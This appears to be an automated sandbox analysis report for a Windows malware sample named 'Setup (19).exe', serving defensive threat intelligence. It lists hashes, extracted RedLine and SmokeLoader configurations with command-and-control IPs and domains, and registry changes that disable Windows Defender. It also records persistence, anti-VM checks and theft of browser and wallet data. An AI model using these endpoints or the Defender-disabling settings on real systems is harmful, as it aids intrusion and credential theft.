Overview
overview
10Static
static
Setup (1).exe
windows11_x64
10Setup (10).exe
windows11_x64
10Setup (11).exe
windows11_x64
10Setup (12).exe
windows11_x64
10Setup (13).exe
windows11_x64
10Setup (14).exe
windows11_x64
10Setup (15).exe
windows11_x64
10Setup (16).exe
windows11_x64
10Setup (17).exe
windows11_x64
10Setup (18).exe
windows11_x64
10Setup (19).exe
windows11_x64
10Setup (2).exe
windows11_x64
10Setup (20).exe
windows11_x64
10Setup (21).exe
windows11_x64
Setup (22).exe
windows11_x64
Setup (23).exe
windows11_x64
1Setup (24).exe
windows11_x64
10Setup (25).exe
windows11_x64
10Setup (26).exe
windows11_x64
10Setup (27).exe
windows11_x64
10Setup (28).exe
windows11_x64
10Setup (29).exe
windows11_x64
10Setup (3).exe
windows11_x64
10Setup (30).exe
windows11_x64
10Setup (31).exe
windows11_x64
10Setup (4).exe
windows11_x64
10Setup (5).exe
windows11_x64
10Setup (6).exe
windows11_x64
10Setup (7).exe
windows11_x64
10Setup (8).exe
windows11_x64
1Setup (9).exe
windows11_x64
10Setup.exe
windows11_x64
10Resubmissions
15/10/2024, 15:36
241015-s1zlzasdkc 1001/07/2024, 18:32
240701-w6yteawhmq 1001/07/2024, 14:52
240701-r82wmaxdnd 1001/07/2024, 14:52
240701-r8syqa1dpp 1011/03/2024, 21:22
240311-z8dsssgg58 1001/09/2021, 13:18
210901-5bmxjspa5s 1001/09/2021, 13:04
210901-te4btfspqa 1001/09/2021, 05:12
210901-4wnkwm1p3j 1031/08/2021, 21:47
210831-41rp97dma2 10Analysis
-
max time kernel
492s -
max time network
1785s -
platform
windows11_x64 -
resource
win11 -
submitted
21/08/2021, 19:20
Static task
static1
Behavioral task
behavioral1
Sample
Setup (1).exe
Resource
win11
Behavioral task
behavioral2
Sample
Setup (10).exe
Resource
win11
Behavioral task
behavioral3
Sample
Setup (11).exe
Resource
win11
Behavioral task
behavioral4
Sample
Setup (12).exe
Resource
win11
Behavioral task
behavioral5
Sample
Setup (13).exe
Resource
win11
Behavioral task
behavioral6
Sample
Setup (14).exe
Resource
win11
Behavioral task
behavioral7
Sample
Setup (15).exe
Resource
win11
Behavioral task
behavioral8
Sample
Setup (16).exe
Resource
win11
Behavioral task
behavioral9
Sample
Setup (17).exe
Resource
win11
Behavioral task
behavioral10
Sample
Setup (18).exe
Resource
win11
Behavioral task
behavioral11
Sample
Setup (19).exe
Resource
win11
Behavioral task
behavioral12
Sample
Setup (2).exe
Resource
win11
Behavioral task
behavioral13
Sample
Setup (20).exe
Resource
win11
Behavioral task
behavioral14
Sample
Setup (21).exe
Resource
win11
Behavioral task
behavioral15
Sample
Setup (22).exe
Resource
win11
Behavioral task
behavioral16
Sample
Setup (23).exe
Resource
win11
Behavioral task
behavioral17
Sample
Setup (24).exe
Resource
win11
Behavioral task
behavioral18
Sample
Setup (25).exe
Resource
win11
Behavioral task
behavioral19
Sample
Setup (26).exe
Resource
win11
Behavioral task
behavioral20
Sample
Setup (27).exe
Resource
win11
Behavioral task
behavioral21
Sample
Setup (28).exe
Resource
win11
Behavioral task
behavioral22
Sample
Setup (29).exe
Resource
win11
Behavioral task
behavioral23
Sample
Setup (3).exe
Resource
win11
Behavioral task
behavioral24
Sample
Setup (30).exe
Resource
win11
Behavioral task
behavioral25
Sample
Setup (31).exe
Resource
win11
Behavioral task
behavioral26
Sample
Setup (4).exe
Resource
win11
Behavioral task
behavioral27
Sample
Setup (5).exe
Resource
win11
Behavioral task
behavioral28
Sample
Setup (6).exe
Resource
win11
Behavioral task
behavioral29
Sample
Setup (7).exe
Resource
win11
Behavioral task
behavioral30
Sample
Setup (8).exe
Resource
win11
Behavioral task
behavioral31
Sample
Setup (9).exe
Resource
win11
Behavioral task
behavioral32
Sample
Setup.exe
Resource
win11
General
-
Target
Setup (19).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
redline
dibild
135.148.139.222:33569
Extracted
smokeloader
2020
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
http://readinglistforaugust1.club/
http://readinglistforaugust2.club/
http://readinglistforaugust3.club/
http://readinglistforaugust4.club/
http://readinglistforaugust5.club/
http://readinglistforaugust6.club/
http://readinglistforaugust7.club/
http://readinglistforaugust8.club/
http://readinglistforaugust9.club/
http://readinglistforaugust10.club/
Extracted
metasploit
windows/single_exec
Extracted
redline
19.08
95.181.172.100:6795
Signatures
-
Glupteba Payload 1 IoCs
resource yara_rule behavioral11/memory/1832-439-0x0000000004950000-0x0000000005276000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5672 4816 rundll32.exe 40 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
resource yara_rule behavioral11/memory/2012-297-0x0000000000000000-mapping.dmp family_redline behavioral11/memory/2012-303-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral11/memory/2468-321-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral11/memory/2468-319-0x0000000000000000-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 33 IoCs
description pid Process procid_target PID 3376 created 4804 3376 WerFault.exe 93 PID 4128 created 2012 4128 WerFault.exe 128 PID 960 created 1520 960 WerFault.exe 368 PID 3472 created 3696 3472 WerFault.exe 453 PID 3724 created 556 3724 Esplorarne.exe.com 87 PID 4216 created 4472 4216 WerFault.exe 94 PID 1500 created 1624 1500 WerFault.exe 146 PID 5648 created 1832 5648 Process not Found 484 PID 5940 created 5728 5940 WerFault.exe 273 PID 132 created 6136 132 WerFault.exe 189 PID 6320 created 1232 6320 WerFault.exe 257 PID 6716 created 5080 6716 WerFault.exe 183 PID 3056 created 2860 3056 WerFault.exe 219 PID 1712 created 2144 1712 WerFault.exe 249 PID 3504 created 5644 3504 Esplorarne.exe.com 201 PID 1584 created 6132 1584 WerFault.exe 468 PID 1732 created 5320 1732 WerFault.exe 308 PID 7112 created 6048 7112 WerFault.exe 218 PID 1560 created 2372 1560 WerFault.exe 144 PID 6428 created 1352 6428 7F70.exe 222 PID 2888 created 5336 2888 WerFault.exe 190 PID 6520 created 6640 6520 WerFault.exe 251 PID 2108 created 1176 2108 WerFault.exe 197 PID 5812 created 680 5812 WerFault.exe 290 PID 2120 created 6428 2120 Esplorarne.exe.com 295 PID 6184 created 3960 6184 WerFault.exe 304 PID 5288 created 6044 5288 WerFault.exe 264 PID 6856 created 7040 6856 WerFault.exe 367 PID 5468 created 4072 5468 WerFault.exe 410 PID 2868 created 5976 2868 WerFault.exe 428 PID 5380 created 5976 5380 WerFault.exe 428 PID 3128 created 6072 3128 WerFault.exe 431 PID 5940 created 5976 5940 WerFault.exe 428 -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 580 created 1204 580 svchost.exe 381 PID 580 created 1204 580 svchost.exe 381 -
Turns off Windows Defender SpyNet reporting 2 TTPs
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral11/memory/1520-318-0x0000000003FF0000-0x000000000408D000-memory.dmp family_vidar behavioral11/memory/1624-418-0x0000000004A40000-0x0000000004ADD000-memory.dmp family_vidar -
Blocklisted process makes network request 19 IoCs
flow pid Process 279 5428 MsiExec.exe 282 5428 MsiExec.exe 285 5428 MsiExec.exe 289 5428 MsiExec.exe 292 5428 MsiExec.exe 329 5428 MsiExec.exe 331 5428 MsiExec.exe 334 5428 MsiExec.exe 334 5428 MsiExec.exe 334 5428 MsiExec.exe 279 5428 MsiExec.exe 289 5428 MsiExec.exe 292 5428 MsiExec.exe 285 5428 MsiExec.exe 282 5428 MsiExec.exe 331 5428 MsiExec.exe 329 5428 MsiExec.exe 433 1844 powershell.exe 436 1844 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts 3377047_logo_media.exe File opened for modification C:\Windows\System32\drivers\SET8C1A.tmp DrvInst.exe File created C:\Windows\System32\drivers\SET8C1A.tmp DrvInst.exe File opened for modification C:\Windows\System32\drivers\tap0901.sys DrvInst.exe -
Executes dropped EXE 64 IoCs
pid Process 1176 4zv49o0BReBcTSeSJWSxuJQU.exe 556 xS4bPod6q8LOd2_YCiund2nD.exe 1632 NrLBDgFrC3ZdkgRSNcLC8zYU.exe 4376 WJ_e7HTdrLfMNW8xRKfMDvdr.exe 1520 p5GfN9yXVX6XndpczBb4lArn.exe 1328 XNEWCHpYJd0x0btof4XyW7NO.exe 3760 MBJox4dDfp3iXpYL1uMWDcV9.exe 3716 yoSELgi7GveD0SOTSBcpGphr.exe 4472 106F8hgdUBvXKgZ3NYbZ3pyB.exe 4804 n5nTSRcErppPLBkBjsISDV39.exe 3184 y2MTuWuQtoPlnFfXprEpHn2p.exe 1292 Yc94pk6Qb8xoa9ZqzcuEiAiz.exe 1164 jvR92GSd8iMEJXGEP_8BYtDn.exe 968 rXWNCjyQ7NdIRIQgLUvwmIJb.exe 1204 ILaP9xOkc_blH5CYYCVjGqbU.exe 1004 wOvfwfxpjNKg86YqEsq3Um02.exe 1832 W2ic2Ov8QaJnMZlYezKOyERW.exe 3696 guGQCvRkO5mz3ZAOCzM5s1Yr.exe 2584 jooyu.exe 4728 6n21lHOo_9b7d4XrFw3oprcv.exe 2688 md8_8eus.exe 3572 customer3.exe 3160 6n21lHOo_9b7d4XrFw3oprcv.tmp 4320 ILaP9xOkc_blH5CYYCVjGqbU.exe 2288 VPN.tmp 3196 hBS_VbW.EXE 1568 MBJox4dDfp3iXpYL1uMWDcV9.exe 2012 4zv49o0BReBcTSeSJWSxuJQU.exe 2468 MBJox4dDfp3iXpYL1uMWDcV9.exe 5080 7404692.exe 4268 NrLBDgFrC3ZdkgRSNcLC8zYU.exe 1852 6044150.exe 1580 Esplorarne.exe.com 720 Conhost.exe 2712 5154525.exe 2372 8365054.exe 1624 LGCH2-401_2021-08-18_14-40.exe 3708 Inlog.exe 1460 Cleaner Installation.exe 2028 WEATHER Manager.exe 4912 VPN.exe 1548 Inlog.tmp 4880 md7_7dfj.exe 2288 Esplorarne.exe.com 3592 11111.exe 2144 OmkgDhSsYmPCdoo1bg6tebQE.exe 1232 WerFault.exe 5124 MediaBurner2.exe 5300 PBrowFile15.exe 5408 zhaoy-game.exe 5468 WerFault.exe 5528 LivelyScreenRecS1.9.exe 5636 WinHoster.exe 5692 xtect12.exe 5892 jfiag3g_gg.exe 5512 11111.exe 1504 3377047_logo_media.exe 6136 zhaoy-game.exe 5336 4493945.exe 3448 2993625.exe 244 2688278.exe 6040 5951013.exe 2280 aOyuxdhnzKpdLQqKmstaSWkX.exe 1176 8542521.exe -
resource yara_rule behavioral11/files/0x000200000002b206-279.dat upx behavioral11/files/0x000200000002b206-278.dat upx -
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 18F3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wOvfwfxpjNKg86YqEsq3Um02.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion aOyuxdhnzKpdLQqKmstaSWkX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion kIM16cafxLNLWW4ObJ5lbDz3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion kIM16cafxLNLWW4ObJ5lbDz3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 18F3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rXWNCjyQ7NdIRIQgLUvwmIJb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4SCaAqA1TLosYj6QTTRIiBaI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion aOyuxdhnzKpdLQqKmstaSWkX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion n5WhBA6Yak3TTgd7U725hzDM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion wOvfwfxpjNKg86YqEsq3Um02.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rXWNCjyQ7NdIRIQgLUvwmIJb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion WJ_e7HTdrLfMNW8xRKfMDvdr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion WJ_e7HTdrLfMNW8xRKfMDvdr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4SCaAqA1TLosYj6QTTRIiBaI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5D11.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion n5WhBA6Yak3TTgd7U725hzDM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5D11.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Esplorarne.exe.com -
Loads dropped DLL 64 IoCs
pid Process 3160 6n21lHOo_9b7d4XrFw3oprcv.tmp 3160 6n21lHOo_9b7d4XrFw3oprcv.tmp 1548 Inlog.tmp 1548 Inlog.tmp 1460 Cleaner Installation.exe 3732 WerFault.exe 2288 Esplorarne.exe.com 2288 Esplorarne.exe.com 2144 OmkgDhSsYmPCdoo1bg6tebQE.exe 2144 OmkgDhSsYmPCdoo1bg6tebQE.exe 5468 WerFault.exe 5728 Setup.tmp 5116 Cleaner.exe 5116 Cleaner.exe 6660 Setup.exe 816 CompPkgSrv.exe 816 CompPkgSrv.exe 6684 MsiExec.exe 6984 Setup.tmp 6984 Setup.tmp 6684 MsiExec.exe 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 5728 Setup.tmp 1468 MsiExec.exe 816 CompPkgSrv.exe 1468 MsiExec.exe 1468 MsiExec.exe 6360 MsiExec.exe 6360 MsiExec.exe 5428 MsiExec.exe 1836 svrwebui.exe 1836 svrwebui.exe 1836 svrwebui.exe 1836 svrwebui.exe 1836 svrwebui.exe 1836 svrwebui.exe 5428 MsiExec.exe 5428 MsiExec.exe 5428 MsiExec.exe 5428 MsiExec.exe 5428 MsiExec.exe 5428 MsiExec.exe 5428 MsiExec.exe 5428 MsiExec.exe 5428 MsiExec.exe 804 installer.exe 804 installer.exe 804 installer.exe 3252 MsiExec.exe 3252 MsiExec.exe 6628 mask_svc.exe 6628 mask_svc.exe 6628 mask_svc.exe 6628 mask_svc.exe 6628 mask_svc.exe 6628 mask_svc.exe 6984 Setup.tmp 6984 Setup.tmp 6860 MaskVPNUpdate.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral11/files/0x000200000002b1cc-162.dat themida behavioral11/files/0x000200000002b1e1-187.dat themida behavioral11/files/0x000200000002b1e3-185.dat themida behavioral11/files/0x000200000002b1d3-168.dat themida behavioral11/files/0x000200000002b1d3-198.dat themida behavioral11/files/0x000200000002b1e3-197.dat themida behavioral11/files/0x000200000002b1cc-196.dat themida behavioral11/files/0x000200000002b1e1-199.dat themida behavioral11/memory/1004-242-0x0000000000290000-0x0000000000291000-memory.dmp themida behavioral11/memory/968-245-0x0000000000DD0000-0x0000000000DD1000-memory.dmp themida behavioral11/memory/4376-251-0x0000000000B60000-0x0000000000B61000-memory.dmp themida behavioral11/memory/3716-271-0x0000000000480000-0x0000000000481000-memory.dmp themida -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 9DC4.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions 9DC4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\9DC4.exe = "0" 9DC4.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection 9DC4.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet 9DC4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" 9DC4.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths 9DC4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 9DC4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" 9DC4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 9DC4.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Cleaner = "C:\\Users\\Admin\\AppData\\Roaming\\Cleaner\\Cleaner.exe --anbfs" Cleaner_Installation.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 6044150.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Internet Explorer\\Hotypevove.exe\"" 3377047_logo_media.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" msedge.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run aipackagechainer.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\ aipackagechainer.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Cleaner_Installation.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 18F3.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA WJ_e7HTdrLfMNW8xRKfMDvdr.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA aOyuxdhnzKpdLQqKmstaSWkX.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA kIM16cafxLNLWW4ObJ5lbDz3.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md7_7dfj.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA wOvfwfxpjNKg86YqEsq3Um02.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA rXWNCjyQ7NdIRIQgLUvwmIJb.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4SCaAqA1TLosYj6QTTRIiBaI.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA n5WhBA6Yak3TTgd7U725hzDM.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5D11.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\B: CompPkgSrv.exe File opened (read-only) \??\G: CompPkgSrv.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\T: Cleaner Installation.exe File opened (read-only) \??\W: Cleaner Installation.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\J: Cleaner Installation.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\R: Setup.exe File opened (read-only) \??\M: CompPkgSrv.exe File opened (read-only) \??\W: CompPkgSrv.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\I: Cleaner Installation.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: Setup.exe File opened (read-only) \??\S: Setup.exe File opened (read-only) \??\W: Setup.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\E: Setup.exe File opened (read-only) \??\Q: Setup.exe File opened (read-only) \??\K: CompPkgSrv.exe File opened (read-only) \??\X: CompPkgSrv.exe File opened (read-only) \??\F: CompPkgSrv.exe File opened (read-only) \??\L: CompPkgSrv.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\N: Cleaner Installation.exe File opened (read-only) \??\Z: Cleaner Installation.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\G: Setup.exe File opened (read-only) \??\N: CompPkgSrv.exe File opened (read-only) \??\B: Cleaner Installation.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\H: CompPkgSrv.exe File opened (read-only) \??\O: CompPkgSrv.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\Y: Setup.exe File opened (read-only) \??\E: Cleaner Installation.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\M: Setup.exe File opened (read-only) \??\N: Setup.exe File opened (read-only) \??\O: Setup.exe File opened (read-only) \??\P: Setup.exe File opened (read-only) \??\T: CompPkgSrv.exe File opened (read-only) \??\V: CompPkgSrv.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\G: Cleaner Installation.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\H: Setup.exe File opened (read-only) \??\R: Cleaner Installation.exe File opened (read-only) \??\U: Cleaner Installation.exe File opened (read-only) \??\X: Cleaner Installation.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\B: Setup.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 54 ipinfo.io 101 ipinfo.io 131 ipinfo.io 151 ipinfo.io 223 ipinfo.io 231 ipinfo.io 6 ipinfo.io 57 ip-api.com 57 ipinfo.io 127 ipinfo.io 130 ipinfo.io 36 ipinfo.io -
Drops file in System32 directory 16 IoCs
description ioc Process File opened for modification C:\Windows\System32\DriverStore\Temp\{2ac686bd-215e-664f-8fe7-df5b88d38e62}\oemvista.inf DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{2ac686bd-215e-664f-8fe7-df5b88d38e62}\SET6868.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2ac686bd-215e-664f-8fe7-df5b88d38e62}\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2ac686bd-215e-664f-8fe7-df5b88d38e62} DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{2ac686bd-215e-664f-8fe7-df5b88d38e62}\SET6846.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{2ac686bd-215e-664f-8fe7-df5b88d38e62}\SET6857.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2ac686bd-215e-664f-8fe7-df5b88d38e62}\tap0901.cat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2ac686bd-215e-664f-8fe7-df5b88d38e62}\SET6868.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat DrvInst.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF msedge.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2ac686bd-215e-664f-8fe7-df5b88d38e62}\SET6846.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2ac686bd-215e-664f-8fe7-df5b88d38e62}\SET6857.tmp DrvInst.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
pid Process 1004 wOvfwfxpjNKg86YqEsq3Um02.exe 968 rXWNCjyQ7NdIRIQgLUvwmIJb.exe 4376 WJ_e7HTdrLfMNW8xRKfMDvdr.exe 3716 msedge.exe 5136 4SCaAqA1TLosYj6QTTRIiBaI.exe 6248 n5WhBA6Yak3TTgd7U725hzDM.exe 2280 aOyuxdhnzKpdLQqKmstaSWkX.exe 6272 kIM16cafxLNLWW4ObJ5lbDz3.exe 7016 5D11.exe 5676 Esplorarne.exe.com 6508 18F3.exe 504 Conhost.exe 3992 mask_svc.exe 6628 mask_svc.exe -
Suspicious use of SetThreadContext 7 IoCs
description pid Process procid_target PID 1176 set thread context of 2012 1176 8542521.exe 128 PID 3760 set thread context of 2468 3760 MBJox4dDfp3iXpYL1uMWDcV9.exe 132 PID 1632 set thread context of 4268 1632 NrLBDgFrC3ZdkgRSNcLC8zYU.exe 139 PID 1668 set thread context of 6056 1668 Setup.exe 244 PID 6240 set thread context of 5256 6240 A1Dm9fcwxkKZ24qs33cx9NiP.exe 248 PID 4332 set thread context of 6492 4332 purlMAaYQeQTs03DWB9pFjHY.exe 266 PID 6172 set thread context of 5604 6172 9DC4.exe 454 -
Drops file in Program Files directory 64 IoCs
